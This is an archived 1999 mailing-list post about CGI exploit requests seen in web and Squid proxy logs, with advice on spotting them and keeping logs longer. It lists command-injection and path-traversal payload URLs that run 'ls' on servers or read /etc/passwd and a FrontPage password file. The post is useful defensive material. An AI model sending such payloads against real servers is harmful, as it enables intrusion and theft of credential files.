Re: proxying exploit attempts

From: Andrew Daviel <andrew@dont-contact.us>
Date: Fri, 5 Feb 1999 17:10:53 -0800 (PST)

On Sat, 23 Jan 1999, James Young wrote:

> At 04:45 PM 1/23/99 +1000, mlowe@dataline.net.au wrote:
> >Are there any known expolits for squid? If so where is the list/site
> located?

I thought I'd mailed this list, but can't find my post. Maybe I didn't.

I have seen the following CGI exploits, many times:

 /cgi-bin/phf?Qname=me%0als%20-lFa
 /cgi-bin/faxsurvey?ls%20-lFa
 /cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
 /cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
 /cgi-bin/php.cgi?/etc/passwd
 /cgi-bin/view-source?../../../../../../../../etc/passwd
 /cgi-bin/htmlscript?../../../../../../../../etc/passwd
 /cgi-bin/campas?%0als%20-lFa%20/etc
 /cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
 /cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
 /cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc
 /cgi-bin/pfdispaly.cgi?'%0Als%20-lFa%20/etc
 /_vti_pvt/service.pwd

If the origin server traps these but not x-forwarded-for, it looks like
your Squid machine is the abuser.

PHF was distributed with early Apache and NCSA httpd as a demo CGI script.
Webdist I think is an Irix software update tool. Not sure about the
others; they must be fairly common. _vti_pvt I presume is from NT.

One might consider searching for these when doing log rotation, and
preserving the trail for a bit longer than 36 hours or whatever people
use...

regards

Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
Received on Fri Feb 05 1999 - 17:49:52 MST

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:44:28 MST